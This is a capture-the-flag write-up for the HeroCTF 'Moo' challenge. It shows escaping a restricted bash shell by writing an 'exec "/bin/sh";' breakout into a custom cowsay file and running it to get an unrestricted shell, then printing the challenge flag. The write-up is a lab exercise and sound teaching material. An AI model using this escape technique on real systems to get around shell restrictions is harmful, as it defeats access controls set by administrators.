# misc/Moo We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag. ``` ssh -p 11380 dyn05.heroctf.fr user@dyn05.heroctf.fr's password: Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202 ______________________________________________________ / Welcome dear CTF player! You can read the flag with: \ \ /bin/sudo /bin/cat /flag.txt. Or can you?... / ------------------------------------------------------ \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ``` When we try to run the commands, we see we're in a restricted shell: ``` user@moo:~$ /bin/sudo /bin/cat /flag.txt bash: /bin/sudo: restricted: cannot specify `/' in command names ``` Let's take a look at our environment a bit with `env`: ``` bash: env: command not found ``` Next thing to do would be look at what our `PATH` is set to: ``` user@moo:~$ echo $PATH /usr/local/rbin ``` Attempting to update our `PATH` with `export` fails as well: ``` user@moo:~$ PATH=/bin sudo id bash: PATH: readonly variable bash: sudo: command not found ``` Well, let's see what is actually available to us in the only `PATH` we have available: ``` user@moo:~$ ls -la $PATH total 24 drwxr-xr-x 1 root root 4096 Oct 25 18:18 . drwxr-xr-x 1 root root 4096 Oct 25 18:18 .. lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls -rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash -rwxr-xr-x 1 root root 54 Oct 25 17:35 vim ``` This reveals a few things: - We are in a restricted bashshell - We have `cowsay` So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have `vim`. After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`: ``` cowsay -f tmp x ``` This gives us a full unrestricted shell, and we can now `cat` the flag: ``` PATH=/bin Hero{s0m3_s4cr3d_c0w} ```